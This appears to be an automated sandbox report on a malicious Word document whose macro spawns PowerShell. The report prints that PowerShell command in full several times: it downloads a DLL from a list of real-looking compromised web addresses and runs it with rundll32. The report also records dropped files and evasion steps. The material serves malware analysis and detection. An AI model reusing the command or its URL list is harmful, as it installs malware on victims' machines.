Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_3__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: Set JbxHook_Open_3__ob_set = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2)
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_3__ob_set
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: Set WB = JbxHook_Open_3__ob_set(28, Workbooks, FileName, False, True)
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE, VBA macro line: Private Sub Document_Open()

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615A13F0 zwxnlwalmcbgmt,

14_2_615A13F0

Source: 1711.doc	OLE indicator has summary info: false
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE indicator has summary info: false
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE indicator has summary info: false

Source: 1711.doc	OLE indicator, VBA macros: true
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE indicator, VBA macros: true

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@27/26@2/24

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615AEBD0 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,

14_2_615AEBD0

Source: 1711.doc	OLE document summary: title field not present or empty
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DFE2F261E3909AA4D4.TMP.0.dr	OLE document summary: edited time not present or 0
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: 1711.doc	Virustotal: Detection: 39%
Source: 1711.doc	Metadefender: Detection: 20%
Source: 1711.doc	ReversingLabs: Detection: 57%

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\13791789.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk",OlFSBFftEbm
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\13791789.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk",OlFSBFftEbm	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InProcServer32

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{E3FF1F0A-4208-4AB1-BD02-5AC59AFBF013} - OProcSessId.dat

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615ABC70 SHGetFolderPathW,CoCreateInstance,

14_2_615ABC70

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3940:120:WilError_01

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj			Jump to behavior

Obfuscated command line found

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046E12A1 push es; ret	5_2_046E12B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615D8067 push ecx; ret	14_2_615D807A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B5C26 push ecx; ret	14_2_615B5C39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00671229 push eax; retf	16_2_0067129A

Source: 13791789.dll.5.dr

Static PE information: real checksum: 0x81586 should be: 0x7d179

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\13791789.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\13791789.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615B7C47 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

14_2_615B7C47

Source: C:\Windows\System32\svchost.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
